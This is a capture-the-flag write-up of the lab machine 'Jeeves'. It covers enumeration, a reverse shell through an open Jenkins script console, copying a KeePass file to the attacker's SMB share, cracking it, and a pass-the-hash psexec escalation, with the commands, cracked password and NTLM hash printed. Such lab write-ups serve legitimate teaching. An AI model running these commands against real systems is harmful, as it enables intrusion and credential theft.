# JEEVES | 10.10.10.63

## Initial Enumeration - nmap

    nmap -v -T4 -sC -sV -oN nmap/initial $IP

### Open Ports and their Services

* 80 - HTTP - Microsoft IIS httpd 10.0
* 135 - MSRPC
* 445 - SMB
* 50000 - Jetty 9.4.z-SNAPSHOT

### OS Discovery

Most likely a version of Windows 10 due to the version of IIS running.

## Service Enumeration

### 80 - HTTP

It is running what looks to be a search app, but when you search for anything it simply returns an error page that is actually an image:

![jeeves](img/port-80-jeeves.png)

I'll run gobuster on it to see if any other dirs pop up:

    gobuster dir -u http://10.10.10.63 -w /usr/share/wordlists/dirb/big.txt -x aspx,php,html

### 135/445 - RPC/SMB

Running rpcclient and smbclient doesn't allow a null session or anonymous access, so without credentials we can't make use of these services at the moment.

### 50000 - JETTY 9.4.z-SNAPSHOT

Navigating to the address on this port gives me a 404 error page, linking to something called Jetty:

![](img/port-50000.png)

It appears to be a kind of webserver, and running a searchspolit query on the installed version does not show any vulns; a google search notes a memory leak of shared buffers, but I'm not sure what to make of it.

Since this is also a webserver of sorts, I decide to run gobuster on it as well:

    gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx,php,html

After what felt like forever I have a hit:

![](img/askjeeves.png)

Navigating to the page reveals an unprotected Jenkins page, which means I will be able to run code to get a reverse shell.

## Exploitation

### Groovy Reverse Shell

The Jenkins console has a "Script Console" that allows you to run arbitrary scripts; all I need to do is paste a [groovy reverse shell](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#groovy) script in the box and execute it, and have a netcat listener waiting on my machine.

![](img/console.png)

    rlwrap nc -nvlp 6969

And just like that, I have a low-privilege shell.

![](img/shell.png)

## Enumeration

We're on a Windows 10 Pro Build 10586 machine with 10 hotfixes installed, according to _systeminfo_.

Our user, **kohsuke**, has the SeImpersonatePrivilege enabled, so perhaps token impersonation is our way to privesc.

![](img/whoami-all.png)

Both winPEAS and windows-exploit-suggester found several potential kernel vulnerabilities on the machine:

![](img/vulns.png)

But there was something else interesting right at the end of WinPEAS: an encrypted KeePass database file that is sure to contain all kinds of juicy passwords.

![](img/kdbx.png)

I set up a quick smb server on my machine and had the windows machine connect to it, then copied the file over:

    # smbserver.py -smb2support Folder pwd
    > net use s: \\10.10.14.36\Folder
    > copy CEH.kdbx s:

Now we have the encrypted db on our hard drive; we now need to convert it to a hash and crack the hash. Kali has programs for this kind of thing:

    keepass2john CEH.kdbx > hash
    john --wordlist=/usr/share/wordlists/rockyou.txt

After a moment, the password is found:

![](img/password.png)

Next thing to do is to try to open the db in KeePass2 (on Kali 2020 I had to install it - apt install keepass2). After inputting the password "moonshine1" I'm in:

![](img/keepass1.png)

There are a number of credentials here, and at first the one titled "It's a secret" intrigued me; but I checked with netstat -ano if there was anything running on localhost on that port and there wasn't.  
So the next credential that got my attention was the "Backup Stuff" entry, as the password there turns out to be an NTLM hash:

    aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

This means we can attack the machine with a "Pass-the-hash" attack.

## Privilege Escalation

### Pass the hash

In some situations, you don't even need to crack the hash you find - passing it along can also work to privesc.

I am going to try this technique using the psexec tool by [impacket](https://github.com/SecureAuthCorp/impacket) since I am most familiar with it at time of writing:

    psexec.py administrator@10.10.10.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

And it worked! I am now NT AUTHORITY\SYSTEM:

![](img/root.png)

Now all I have to grab is the flag and ...

![](img/hm.png)

What's this? The flag is usually here. Looks like it's back to the web to do some more research.

### Alternate Data Streams (ADS)

This is a feature of the NTFS file system in which you can basically hide data inside a file. So the "hm.txt" file has the flag in there, I just need to know how to access it.

I tried using a program called "streams.exe" but it turns out to not be installed on the system.

After a lot of digging I found I could use a pretty simple command to see the hidden contents:

    more < hm.txt:root.txt

And now I can see the flag:

![](img/root-flag.png)


## Conclusion

This was a fun box, and some parts that should have been simple were a challenge for me; for example, just trying to exfiltrate the keePass db to my machine was vexing. I couldn't get it to upload to a python ftp server I set up, and then the syntax for connecting to my SMB server was puzzling.  
Other than that, super fun and neat and cool.

The steps I took to root this box:

* Discovered a directory on the webserver running on port 50000, which led to an open Jenkins admin page
* Ran a script on the script console on the Jenkins interface, getting a reverse shell
* Then I enumerated until I found a KeePass database, cracked the hash for that, and found an NTLM hash in the database
* Finally, I used psexec to escalate my privileges to root
* Also, I learned a bit about Alternate Data Streams.
